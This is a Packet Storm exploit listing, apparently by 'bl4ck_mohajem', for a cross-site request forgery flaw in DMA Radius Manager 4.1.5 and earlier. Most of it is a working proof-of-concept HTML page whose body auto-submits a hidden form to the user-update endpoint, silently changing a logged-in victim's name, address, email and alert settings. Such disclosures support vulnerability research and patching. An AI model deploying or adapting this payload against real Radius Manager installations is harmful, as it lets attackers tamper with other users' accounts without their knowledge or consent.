DMA Radius Manager versions 4.1.5 and below suffer from a cross site request forgery vulnerability.
08e9e09c8a266941fa5e15bd3bcbeb12102fb65acd809a60445e63f710a03643<!--
# Exploit Title: DMA Radius Manager <= 4.1.5 CSRF (Edit Account)
# Exploit Author: bl4ck_mohajem
# Vendor Homepage: http://yonacms.com
# Version: 4.1.5
# Overview
DMA Radius Manager is a easy to use administration system for
Mikrotik, Cisco, StarOS, Chillispot, DD-WRT, pfSense NAS devices and
DOCSIS CMTS. It provides centralized authentication, accounting and
billing functions.
CSRF PoC Code
=============
-->
<html>
<body onload="document.csrf.submit()">
<form name="csrf"
action="http://127.0.0.1/user.php?cont=update_user" method="post">
<input name="firstname" type="hidden" value="Name">
<input name="lastname" type="hidden" value="Family">
<input name="address" type="hidden" value="IRan">
<input name="city" type="hidden" value="IRAN">
<input name="zip" type="hidden" value="010101">
<input name="country" type="hidden" value="Albania">
<input name="state" type="hidden" value="Alabama">
<input name="phone" type="hidden" value="00000000">
<input name="mobile" type="hidden" value="000000000">
<input name="email" type="hidden" value="">
<input name="company" type="hidden" value="">
<input name="taxid" type="hidden" value="">
<input name="lang" type="hidden" value="English">
<input name="alertsms" type="hidden" value="1">
</form>
</body>
</html>
<!--
-->
######################################################
#
#tanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky
############################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed